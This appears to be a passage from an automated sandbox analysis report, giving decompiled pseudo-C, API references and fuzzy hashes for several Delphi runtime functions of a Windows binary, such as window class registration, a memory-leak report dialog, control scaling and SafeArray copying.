&_v68; if(RegisterClassA( &_v108) == 0) { E0040D764(); } } *0x462560 = _t112; _t96 = *_t112; *((intOrPtr*)( *_t112 + 0xa0))(); if( *(_t112 + 0x1b4) == 0) { E0040D764(); } if((GetWindowLongA( *(_t112 + 0x1b4), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t112 + 0x1b4), 0xfffffff4) == 0) { SetWindowLongA( *(_t112 + 0x1b4), 0xfffffff4, *(_t112 + 0x1b4)); } E0040927C( *((intOrPtr*)(_t112 + 0x64))); *((intOrPtr*)(_t112 + 0x64)) = 0; E00442700(_t112); E0043BC9C(_t112, E0042590C( *((intOrPtr*)(_t112 + 0x68)), _t94, _t96, _t110, _t112), 0x30, 1); _t131 = *((char*)(_t112 + 0x5c)); if( *((char*)(_t112 + 0x5c)) != 0) { E00403B24(_t112, _t131); } _pop(_t105); *[fs:eax] = _t105; _push(0x43ec08); return E0040473C( &_v196); } else { _t94 = *((intOrPtr*)(__eax + 4)); if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) { L6: _v192 = *((intOrPtr*)(_t112 + 8)); _v188 = 0xb; _t86 = *0x462dec; // 0x423568 E00406740(_t86, &_v196); E0040C158(_t94, _v196, 1, _t110, _t112, 0, &_v192); E00404184(); } else { _t109 = *0x4369e8; // 0x436a34 if(E00403AB4(_t94, _t109) == 0) { goto L6; } _v116 = E004423F8(_t94); } goto L7; } } 0x0043ea40 0x0043ea40 0x0043ea49 0x0043ea4a 0x0043ea4d 0x0043ea53 0x0043ea57 0x0043ea58 0x0043ea5d 0x0043ea60 0x0043ea6d 0x0043ea77 0x0043eaec 0x0043eaef 0x0043eb04 0x0043eb0c 0x0043eb0e 0x0043eb11 0x0043eb22 0x0043eb2c 0x0043eb2c 0x0043eb31 0x0043eb3b 0x0043eb4a 0x0043eb4c 0x0043eb4c 0x0043eb4a 0x0043eb51 0x0043eb5f 0x0043eb61 0x0043eb6e 0x0043eb70 0x0043eb70 0x0043eb88 0x0043eba6 0x0043eba6 0x0043ebae 0x0043ebb5 0x0043ebba 0x0043ebd2 0x0043ebd7 0x0043ebdb 0x0043ebe3 0x0043ebe3 0x0043ebea 0x0043ebed 0x0043ebf0 0x0043ec00 0x0043ea82 0x0043ea82 0x0043ea87 0x0043eaac 0x0043eaaf 0x0043eab5 0x0043eacb 0x0043ead0 0x0043eae2 0x0043eae7 0x0043ea8f 0x0043ea91 0x0043ea9e 0x00000000 0x00000000 0x0043eaa7 0x0043eaa7 0x00000000 0x0043ea87

APIs

GetClassInfoA.USER32 ref: 0043EB04 UnregisterClassA.USER32 ref: 0043EB2C RegisterClassA.USER32 ref: 0043EB42 GetWindowLongA.USER32 ref: 0043EB7E GetWindowLongA.USER32 ref: 0043EB93 SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 0043EBA6

Strings

h5B , xrefs: 0043EACB 4jC , xrefs: 0043EA91 @ , xrefs: 0043EA79

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassLongWindow$InfoRegisterUnregister String ID: 4jC$@$h5B API String ID: 717780171-916785525 Opcode ID: 23814c8b448176fa15c958dc6a007fd35c890fe50a8182ec585c7e2c3e7324e2 Instruction ID: d23709e6df1bb4d3d126ec428beffe84ce2308d2414f8cb5aec67fee482d3fa9 Opcode Fuzzy Hash: 23814c8b448176fa15c958dc6a007fd35c890fe50a8182ec585c7e2c3e7324e2 Instruction Fuzzy Hash: E2518670A013449BDB21EB66CC81B9EB3E8BF48308F00456AF845E73D2DB38AD45CB59

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E0040C054(void* __edx, void* __edi, void* __fp0) { void _v1024; char _v1088; long _v1092; void* _t12; char* _t14; intOrPtr _t16; intOrPtr _t18; intOrPtr _t24; long _t32; E0040BECC(_t12, &_v1024, __edx, __fp0, 0x400); _t14 = *0x462e14; // 0x46304c if( *_t14 == 0) { _t16 = *0x462b88; // 0x40762c _t9 = _t16 + 4; // 0xffec _t18 = *0x4657f8; // 0x400000 LoadStringA(E00405C64(_t18), *_t9, &_v1088, 0x40); return MessageBoxA(0, &_v1024, &_v1088, 0x2010); } _t24 = *0x462bec; // 0x46321c E00402E68(E004030B4(_t24)); CharToOemA( &_v1024, &_v1024); _t32 = E00409008( &_v1024, __edi); WriteFile(GetStdHandle(0xfffffff4), &_v1024, _t32, &_v1092, 0); return WriteFile(GetStdHandle(0xfffffff4), E0040C118, "true", &_v1092, 0); } 0x0040c063 0x0040c068 0x0040c070 0x0040c0d7 0x0040c0dc 0x0040c0e0 0x0040c0eb 0x00000000 0x0040c101 0x0040c072 0x0040c07c 0x0040c08b 0x0040c09b 0x0040c0ae 0x00000000

APIs

Part of subcall function 0040BECC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040BEE9 Part of subcall function 0040BECC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040BF0D Part of subcall function 0040BECC: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040BF28 Part of subcall function 0040BECC: LoadStringA.USER32 ref: 0040BFBE CharToOemA.USER32 ref: 0040C08B GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040C0A8 WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040C0AE GetStdHandle.KERNEL32(000000F4,0040C118,?,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040C0C3 WriteFile.KERNEL32(00000000,000000F4,0040C118,?,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040C0C9 LoadStringA.USER32 ref: 0040C0EB MessageBoxA.USER32 ref: 0040C101

Strings

L0F , xrefs: 0040C068 ,v@ , xrefs: 0040C0D7

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual String ID: ,v@$L0F API String ID: 185507032-114336920 Opcode ID: 07f17ca0095baed20458b404fad0876ad00edfc715b2c3dd6b064ac9ae374d2e Instruction ID: 968c3332249ca419ab36ba5ff9e4d5e5c4f2a2f71d5e9e194e9044cb27fed959 Opcode Fuzzy Hash: 07f17ca0095baed20458b404fad0876ad00edfc715b2c3dd6b064ac9ae374d2e Instruction Fuzzy Hash: F61154B1148204BAD200EB95CC86F8B77EC9B44704F40453BB755FA1D3DAB9E94487AB

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 98%

E0040262A(void* __eax) { void* _v8; char _v110600; char _v112644; char _v112645; signed int _v112652; char _v112653; char _v112654; char _v112660; intOrPtr _v112664; intOrPtr _v112668; intOrPtr _v112672; struct HWND__* _v112676; signed short* _v112680; intOrPtr* _v112684; char _v129068; char _v131117; char _v161836; void* _v162091; signed char _v162092; void* _t73; int _t79; signed int _t126; int _t131; intOrPtr _t132; char* _t134; char* _t135; char* _t136; char* _t137; char* _t138; char* _t139; char* _t141; char* _t142; char* _t147; char* _t148; intOrPtr _t180; void* _t182; void* _t184; void* _t185; intOrPtr* _t188; intOrPtr* _t189; signed int _t194; void* _t198; void* _t200; void* _t214; _t198 = _t200; _push(__eax); _t73 = 0x27; goto L2; L13: while(_t180 != 0x463708) { _t79 = E00402144(_t180); _t131 = _t79; __eflags = _t131; if(_t131 == 0) { L12: _t180 = *((intOrPtr*)(_t180 + 4)); continue; } else { goto L5; } do { L5: _t194 = *(_t131 - 4); __eflags = _t194 & 0x00000001; if((_t194 & 0x00000001) == 0) { __eflags = _t194 & 0x00000004; if(__eflags == 0) { __eflags = _v112652 - 0x1000; if(_v112652 < 0x1000) { _v112664 = (_t194 & 0xfffffff0) - 4; _t126 = E00402488(_t131); __eflags = _t126; if(_t126 == 0) { _v112645 = 0; *((intOrPtr*)(_t198 + _v112652 * 4 - 0x1f828)) = _v112664; _t18 = &_v112652; *_t18 = _v112652 + 1; __eflags = *_t18; } } } else { E004024E0(_t131, __eflags, _t198); } } _t79 = E00402120(_t131); _t131 = _t79; __eflags = _t131; } while (_t131 != 0); goto L12; } _t132 = *0x4657b0; // 0x4657ac while(_t132 != 0x4657ac && _v112652 < 0x1000) { _t79 = E00402488(_t132 + 0x10); __eflags = _t79; if(_t79 == 0) { _v112645 = 0; _t22 = _t132 + 0xc; // 0x0 _t79 = _v112652; *((intOrPtr*)(_t198 + _t79 * 4 - 0x1f828)) = ( *_t22 & 0xfffffff0) - 0xfffffffffffffff4; _t27 = &_v112652; *_t27 = _v112652 + 1; __eflags = *_t27; } _t29 = _t132 + 4; // 0x4657ac _t132 = *_t29; } if(_v112645 != 0) { L49: return _t79; } _v112653 = 0; _v112668 = 0; _t134 = E004022DC(0x28, &_v161836); _v112660 = 0x37; _v112680 = 0x46103e; _v112684 = &_v110600; do { _v112672 = ( *_v112680 & 0x0000ffff) - 4; _v112654 = 0; _t182 = 0xff; _t188 = _v112684; while(_t134 <= &_v131117) { if( *_t188 > 0) { if(_v112653 == 0) { _t134 = E004022DC(0x27, _t134); _v112653 = 1; } if(_v112654 != 0) { *_t134 = 0x2c; _t139 = _t134 + 1; *_t139 = 0x20; _t140 = _t139 + 1; __eflags = _t139 + 1; } else { *_t134 = 0xd; *((char*)(_t134 + 1)) = 0xa; _t147 = E004021C0(_v112668 + 1, _t134 + 2); *_t147 = 0x20; _t148 = _t147 + 1; *_t148 = 0x2d; *((char*)(_t148 + 1)) = 0x20; _t140 = E004022DC(8, E004021C0(_v112672, _t148 + 2)); _v112654 = 1; } _t214 = _t182 - 1; if(_t214 < 0) { _t141 = E004022DC(7, _t140); } else { if(_t214 == 0) { _t141 = E004022DC(6, _t140); } else { E00403808( *((intOrPtr*)(_t188 - 4)), &_v162092); _t141 = E004022DC(_v162092 & 0x000000ff, _t140); } } *_t141 = 0x20; _t142 = _t141 + 1; *_t142 = 0x78; *((char*)(_t142 + 1)) = 0x20; _t134 = E004021C0( *_t188, _t142 + 2); } _t182 = _t182 - 1; _t188 = _t188 - 8; if(_t182 != 0xffffffff) { continue; } else { goto L38; } } L38: _v112668 = _v112672; _v112684 = _v112684 + 0x800; _v112680 = &(_v112680[0x10]); _t60 = &_v112660; *_t60 = _v112660 - 1; } while ( *_t60 != 0); if(_v112652 <= 0) { L48: E004022DC(3, _t134); _t79 = MessageBoxA(0, &_v161836, "Unexpected Memory Leak", 0x2010); goto L49; } if(_v112653 != 0) { *_t134 = 0xd; _t136 = _t134 + 1; *_t136 = 0xa; _t137 = _t136 + 1; *_t137 = 0xd; _t138 = _t137 + 1; *_t138 = 0xa; _t134 = _t138 + 1; } _t134 = E004022DC(0x3c, _t134); _t184 = _v112652 - 1; if(_t184 >= 0) { _t185 = _t184 + 1; _v112676 = 0; _t189 = &_v129068; L44: L44: if(_v112676 != 0) { *_t134 = 0x2c; _t135 = _t134 + 1; *_t135 = 0x20; _t134 = _t135 + 1; } _t134 = E004021C0( *_t189, _t134); if(_t134 > &_v131117) { goto L48; } _v112676 = &(_v112676->i); _t189 = _t189 + 4; _t185 = _t185 - 1; if(_t185 != 0) { goto L44; } } L2: _t200 = _t200 + 0xfffff004; _push(_t73); _t73 = _t73 - 1; if(_t73 != 0) { goto L2; } else { E00403264( &_v112644, 0x1b800); E00403264( &_v129068, 0x4000); _t79 = 0; _v112652 = 0; _v112645 = 1; _t180 = *0x46370c; // 0x26c0000 goto L13; } } 0x0040262d 0x0040262f 0x00402630 0x00402630 0x00000000 0x0040270b 0x0040268b 0x00402690 0x00402692 0x00402694 0x00402708 0x00402708 0x00000000 0x00000000 0x00000000 0x00000000 0x00402696 0x00402696 0x0040269b 0x0040269d 0x004026a3 0x004026a5 0x004026ab 0x004026b8 0x004026c2 0x004026ca 0x004026d2 0x004026d7 0x004026d9 0x004026db 0x004026ee 0x004026f5 0x004026f5 0x004026f5 0x004026f5 0x004026d9 0x004026ad 0x004026b0 0x004026b5 0x004026ab 0x004026fd 0x00402702 0x00402704 0x00402704 0x00000000 0x00402696 0x00402717 0x00402756 0x00402724 0x00402729 0x0040272b 0x0040272d 0x00402734 0x00402740 0x00402746 0x0040274d 0x0040274d 0x0040274d 0x0040274d 0x00402753 0x00402753 0x00402753 0x00402771 0x004029cf 0x004029d5 0x004029d5 0x00402777 0x00402780 0x0040279b 0x0040279d 0x004027a7 0x004027b7 0x004027bd 0x004027c9 0x004027cf 0x004027d6 0x004027e1 0x004027e3 0x004027f4 0x00402801 0x00402814 0x00402816 0x00402816 0x00402824 0x00402875 0x00402878 0x00402879 0x0040287c 0x0040287c 0x00402826 0x00402826 0x0040282a 0x0040283c 0x0040283e 0x00402841 0x00402842 0x00402846 0x0040286a 0x0040286c 0x0040286c 0x0040287f 0x00402882 0x00402899 0x00402884 0x00402884 0x004028ae 0x00402886 0x004028bb 0x004028d4 0x004028d4 0x00402884 0x004028d6 0x004028d9 0x004028da 0x004028de 0x004028eb 0x004028eb 0x004028ed 0x004028ee 0x004028f4 0x00000000 0x00000000 0x00000000 0x00000000 0x004028f4 0x004028fa 0x00402900 0x00402906 0x00402910 0x00402917 0x00402917 0x00402917 0x0040292a 0x004029a6 0x004029b2 0x004029ca 0x00000000 0x004029ca 0x00402933 0x00402935 0x00402938 0x00402939 0x0040293c 0x0040293d 0x00402940 0x00402941 0x00402944 0x00402944 0x00402956 0x0040295e 0x00402961 0x00402963 0x00402964 0x0040296e 0x00000000 0x00402974 0x0040297b 0x0040297d 0x00402980 0x00402981 0x00402984 0x00402984 0x0040298e 0x00402998 0x00000000 0x00000000 0x0040299a 0x004029a0 0x004029a3 0x004029a4 0x00000000 0x00000000 0x004029a4 0x00402635 0x00402635 0x0040263b 0x0040263c 0x0040263d 0x00000000 0x0040263f 0x00402658 0x0040266a 0x0040266f 0x00402671 0x00402677 0x0040267e 0x00000000 0x0040267e

Strings

7 , xrefs: 0040279D bytes: , xrefs: 00402859 The unexpected small block leaks are: , xrefs: 00402803 , xrefs: 00402910 An unexpected memory leak has occurred. , xrefs: 0040278C The sizes of unexpected leaked medium and large blocks are: , xrefs: 00402945 Unexpected Memory Leak , xrefs: 004029BC

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak API String ID: 0-2723507874 Opcode ID: ab1744bc822241615f06664216cff9c599eaab7f23789ca155b362964788a165 Instruction ID: 232ad5794996384582659ab8687426251ae0ce960e01d4fcfe06ac857680b770 Opcode Fuzzy Hash: ab1744bc822241615f06664216cff9c599eaab7f23789ca155b362964788a165 Instruction Fuzzy Hash: E771C630B042588FDB21AA2DC988BD9B6E5EB09704F1441FBE049F73C2DBB949C5CB59

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E0043A624(intOrPtr* __eax, int __ecx, int __edx) { signed int _t62; signed int _t64; signed int _t65; signed char _t109; int _t121; intOrPtr* _t122; int _t123; int* _t125; *_t125 = __ecx; _t121 = __edx; _t122 = __eax; if(__edx == *_t125) { L29: _t62 = *0x43a7e0 & 0x000000ff; *(_t122 + 0x8c) = _t62; return _t62; } if(( *(__eax + 0x1c) & 0x00000001) == 0) { _t109 = *0x43a7d8 & 0x000000ff; } else { _t109 = *(__eax + 0x8c) & 0x000000ff; } if((_t109 & 0x00000001) == 0) { _t123 = *(_t122 + 0x40); } else { _t123 = MulDiv( *(_t122 + 0x40), _t121, *_t125); } if((_t109 & 0x00000002) == 0) { _t125[1] = *(_t122 + 0x44); } else { _t125[1] = MulDiv( *(_t122 + 0x44), _t121, *_t125); } if((_t109 & 0x00000004) == 0 || ( *(_t122 + 0x51) & 0x00000001) != 0) { _t64 = *(_t122 + 0x48); _t125[2] = _t64; } else { if((_t109 & 0x00000001) == 0) { _t64 = MulDiv( *(_t122 + 0x48), _t121, *_t125); _t125[2] = _t64; } else { _t64 = MulDiv( *(_t122 + 0x40) + *(_t122 + 0x48), _t121, *_t125) - _t123; _t125[2] = _t64; } } _t65 = _t64 & 0xffffff00 | (_t109 & 0x00000008) != 0x00000000; if(_t65 == 0 || ( *(_t122 + 0x51) & 0x00000002) != 0) { _t125[3] = *(_t122 + 0x4c); } else { if(_t65 == 0) { _t125[3] = MulDiv( *(_t122 + 0x44), _t121, *_t125); } else { _t125[3] = MulDiv( *(_t122 + 0x44) + *(_t122 + 0x4c), _t121, *_t125) - _t125[1]; } } E0043A4D8(_t122, *_t125, _t121); *((intOrPtr*)( *_t122 + 0x88))(_t125[4], _t125[2]); if(( *0x43a7e0 & 0x000000ff) != (_t109 & *0x43a7dc)) { *(_t122 + 0x175) = MulDiv( *(_t122 + 0x175), _t121, *_t125); } if(( *0x43a7e0 & 0x000000ff) != (_t109 & *0x43a7e4)) { *(_t122 + 0x179) = MulDiv( *(_t122 + 0x179), _t121, *_t125); } if( *((char*)(_t122 + 0x59)) == 0 && (_t109 & 0x00000010) != 0) { E00425C2C( *((intOrPtr*)(_t122 + 0x68)), MulDiv(E00425C10( *((intOrPtr*)(_t122 + 0x68))), _t121, *_t125)); } goto L29; } 0x0043a62b 0x0043a62e 0x0043a630 0x0043a635 0x0043a7c2 0x0043a7c2 0x0043a7c9 0x0043a7d6 0x0043a7d6 0x0043a63f 0x0043a64a 0x0043a641 0x0043a641 0x0043a641 0x0043a654 0x0043a668 0x0043a656 0x0043a664 0x0043a664 0x0043a66e 0x0043a687 0x0043a670 0x0043a67e 0x0043a67e 0x0043a68e 0x0043a6c8 0x0043a6cb 0x0043a696 0x0043a699 0x0043a6bd 0x0043a6c2 0x0043a69b 0x0043a6ac 0x0043a6ae 0x0043a6ae 0x0043a699 0x0043a6d2 0x0043a6d7 0x0043a71b 0x0043a6df 0x0043a6e7 0x0043a712 0x0043a6e9 0x0043a6fe 0x0043a6fe 0x0043a6e7 0x0043a726 0x0043a73f 0x0043a756 0x0043a769 0x0043a769 0x0043a780 0x0043a793 0x0043a793 0x0043a79d 0x0043a7bd 0x0043a7bd 0x00000000

APIs

MulDiv.KERNEL32(?,?,?), ref: 0043A65F MulDiv.KERNEL32(?,?,?), ref: 0043A679 MulDiv.KERNEL32(?,?,?), ref: 0043A6A7 MulDiv.KERNEL32(?,?,?), ref: 0043A6BD MulDiv.KERNEL32(?,?,?), ref: 0043A6F5 MulDiv.KERNEL32(?,?,?), ref: 0043A70D Part of subcall function 00425C10: MulDiv.KERNEL32(00000000,00000048,?), ref: 00425C21 MulDiv.KERNEL32(?), ref: 0043A764 MulDiv.KERNEL32(?), ref: 0043A78E MulDiv.KERNEL32(00000000), ref: 0043A7B4 Part of subcall function 00425C2C: MulDiv.KERNEL32(00000000,?,00000048), ref: 00425C39

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 2325144a8e082e646bad59a138fd9ea4b37950158a0450446acd531626ff6a80 Instruction ID: 31ea7b08f01d562e4291b2201e28d04268924927301679854e288b517f7f1c2d Opcode Fuzzy Hash: 2325144a8e082e646bad59a138fd9ea4b37950158a0450446acd531626ff6a80 Instruction Fuzzy Hash: FA513370644750AFC320EB69C885E6BB7F9AF49744F08581EF5D6C7361C739E8608B1A

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 39%

E0043B5A8(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) { char _v5; struct HWND__* _v12; struct HDC__* _v16; void* _v20; intOrPtr _v24; intOrPtr _v28; int _v32; int _v36; int _t76; intOrPtr _t82; int _t85; void* _t90; int _t91; void* _t94; void* _t95; intOrPtr _t96; _t94 = _t95; _t96 = _t95 + 0xffffffe0; _v5 = __ecx; _t76 = *((intOrPtr*)( *__edx + 0x38))(); if(_v5 == 0) { _push(__edx); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _pop(_t90); } else { _push(__edx); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _pop(_t90); } _v12 = GetDesktopWindow(); _v16 = GetDCEx(_v12, 0, 0x402); _push(_t94); _push(0x43b6c3); _push( *[fs:eax]); *[fs:eax] = _t96; _v20 = SelectObject(_v16, E004261BC( *((intOrPtr*)(_t90 + 0x48)))); _t91 = _v36; _t85 = _v32; PatBlt(_v16, _t91 + _t76, _t85, _v28 - _t91 - _t76, _t76, 0x5a0049); PatBlt(_v16, _v28 - _t76, _t85 + _t76, _t76, _v24 - _t85 - _t76, 0x5a0049); PatBlt(_v16, _t91, _v24 - _t76, _v28 - _v36 - _t76, _t76, 0x5a0049); PatBlt(_v16, _t91, _t85, _t76, _v24 - _v32 - _t76, 0x5a0049); SelectObject(_v16, _v20); _pop(_t82); *[fs:eax] = _t82; _push(0x43b6ca); return ReleaseDC(_v12, _v16); } 0x0043b5a9 0x0043b5ab 0x0043b5b1 0x0043b5bd 0x0043b5c3 0x0043b5d3 0x0043b5da 0x0043b5db 0x0043b5dc 0x0043b5dd 0x0043b5de 0x0043b5c5 0x0043b5c5 0x0043b5cc 0x0043b5cd 0x0043b5ce 0x0043b5cf 0x0043b5d0 0x0043b5d0 0x0043b5e4 0x0043b5f7 0x0043b5fc 0x0043b5fd 0x0043b602 0x0043b605 0x0043b61a 0x0043b626 0x0043b62e 0x0043b63b 0x0043b65d 0x0043b67c 0x0043b696 0x0043b6a3 0x0043b6aa 0x0043b6ad 0x0043b6b0 0x0043b6c2

APIs

GetDesktopWindow.USER32 ref: 0043B5DF GetDCEx.USER32(?,00000000,00000402), ref: 0043B5F2 SelectObject.GDI32(?,00000000), ref: 0043B615 PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0043B63B PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043B65D PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0043B67C PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043B696 SelectObject.GDI32(?,?), ref: 0043B6A3 ReleaseDC.USER32 ref: 0043B6BD

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$DesktopReleaseWindow String ID: API String ID: 1187665388-0 Opcode ID: b2c602b1dc45e199638d733ea000c6a1b9b22f9762cdf267a88b65931b3f431e Instruction ID: 4169a8a6f7cde27594b8dc9ea805dfdf28c36229a5204248b9e0b1c31a3baf9f Opcode Fuzzy Hash: b2c602b1dc45e199638d733ea000c6a1b9b22f9762cdf267a88b65931b3f431e Instruction Fuzzy Hash: 6F31FB76A00219BFDB01DEEDCC85EAFBBBCEF09704B414569B504F7281C679AD048BA4

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 77%

E0040FAE0(short* __eax, intOrPtr __ecx, signed short* __edx) { char _v260; char _v768; char _v772; short* _v776; intOrPtr _v780; char _v784; signed int _v788; signed short* _v792; char _v796; char _v800; intOrPtr* _v804; void* __ebp; signed char _t47; signed int _t54; void* _t62; intOrPtr* _t73; signed short* _t91; void* _t93; void* _t95; void* _t98; void* _t99; intOrPtr* _t108; void* _t112; intOrPtr _t113; char* _t114; void* _t115; _t100 = __ecx; _v780 = __ecx; _t91 = __edx; _v776 = __eax; if(( *(__edx + 1) & 0x00000020) == 0) { E0040F688(0x80070057); } _t47 = *_t91 & 0x0000ffff; if((_t47 & 0x00000fff) != 0xc) { _push(_t91); _push(_v776); L0040E2AC(); return E0040F688(_v776); } else { if((_t47 & 0x00000040) == 0) { _v792 = _t91[4]; } else { _v792 = *(_t91[4]); } _v788 = *_v792 & 0x0000ffff; _t93 = _v788 - 1; if(_t93 < 0) { L9: _push( &_v772); _t54 = _v788; _push(_t54); _push(0xc); L0040E70C(); _t113 = _t54; if(_t113 == 0) { E0040F3E0(_t100); } E0040FA38(_v776); *_v776 = 0x200c; *((intOrPtr*)(_v776 + 8)) = _t113; _t95 = _v788 - 1; if(_t95 < 0) { L14: _t97 = _v788 - 1; if(E0040FA54(_v788 - 1, _t115) != 0) { L0040E744(); E0040F688(_v792); L0040E744(); E0040F688( &_v260); _v780(_t113, &_v260, &_v800, _v792, &_v260, &_v796); } _t62 = E0040FA84(_t97, _t115); } else { _t98 = _t95 + 1; _t73 = &_v768; _t108 = &_v260; do { *_t108 = *_t73; _t108 = _t108 + 4; _t73 = _t73 + 8; _t98 = _t98 - 1; } while (_t98 != 0); do { goto L14; } while (_t62 != 0); return _t62; } } else { _t99 = _t93 + 1; _t112 = 0; _t114 = &_v772; do { _v804 = _t114; _push(_v804 + 4); _t18 = _t112 + 1; // 0x1 _push(_v792); L0040E714(); E0040F688(_v792); _push( &_v784); _t21 = _t112 + 1; // 0x1 _push(_v792); L0040E71C(); E0040F688(_v792); *_v804 = _v784 - *((intOrPtr*)(_v804 + 4)) + 1; _t112 = _t112 + 1; _t114 = _t114 + 8; _t99 = _t99 - 1; } while (_t99 != 0); goto L9; } } } 0x0040fae0 0x0040faec 0x0040faf2 0x0040faf4 0x0040fafe 0x0040fb05 0x0040fb05 0x0040fb0a 0x0040fb18 0x0040fc91 0x0040fc98 0x0040fc99 0x00000000 0x0040fb1e 0x0040fb21 0x0040fb33 0x0040fb23 0x0040fb28 0x0040fb28 0x0040fb42 0x0040fb4e 0x0040fb51 0x0040fbbe 0x0040fbc4 0x0040fbc5 0x0040fbcb 0x0040fbcc 0x0040fbce 0x0040fbd3 0x0040fbd7 0x0040fbd9 0x0040fbd9 0x0040fbe4 0x0040fbef 0x0040fbfa 0x0040fc03 0x0040fc06 0x0040fc22 0x0040fc29 0x0040fc34 0x0040fc4b 0x0040fc50 0x0040fc64 0x0040fc69 0x0040fc7c 0x0040fc7c 0x0040fc85 0x0040fc08 0x0040fc08 0x0040fc09 0x0040fc0f 0x0040fc15 0x0040fc17 0x0040fc19 0x0040fc1c 0x0040fc1f 0x0040fc1f 0x0040fc22 0x00000000 0x00000000 0x00000000 0x0040fc22 0x0040fb53 0x0040fb53 0x0040fb54 0x0040fb56 0x0040fb5c 0x0040fb5e 0x0040fb6d 0x0040fb6e 0x0040fb78 0x0040fb79 0x0040fb7e 0x0040fb89 0x0040fb8a 0x0040fb94 0x0040fb95 0x0040fb9a 0x0040fbb5 0x0040fbb7 0x0040fbb8 0x0040fbbb 0x0040fbbb 0x00000000 0x0040fb5c 0x0040fb51

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040FB79 SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040FB95 SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040FBCE SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040FC4B SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040FC64 VariantCopy.OLEAUT32(?), ref: 0040FC99

Strings

, xrefs: 0040FAFA

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant String ID: API String ID: 351091851-3916222277 Opcode ID: 1259071905c284c690569f5ebbe38a6ff0448cf178a14f89c988a819c5d5ab72 Instruction ID: e8b17cf1572734a03829fa1d627ab26794180486a0a47edda1f815aa89ecf2ba Opcode Fuzzy Hash: 1259071905c284c690569f5ebbe38a6ff0448cf178a14f89c988a819c5d5ab72 Instruction Fuzzy Hash: 38513E7590021D9BCB22DB59C891AD9B3BCAF0C304F4045FAE908F7641D638AF858F65

Uniqueness

Uniqueness Score: -1.00%

APIs

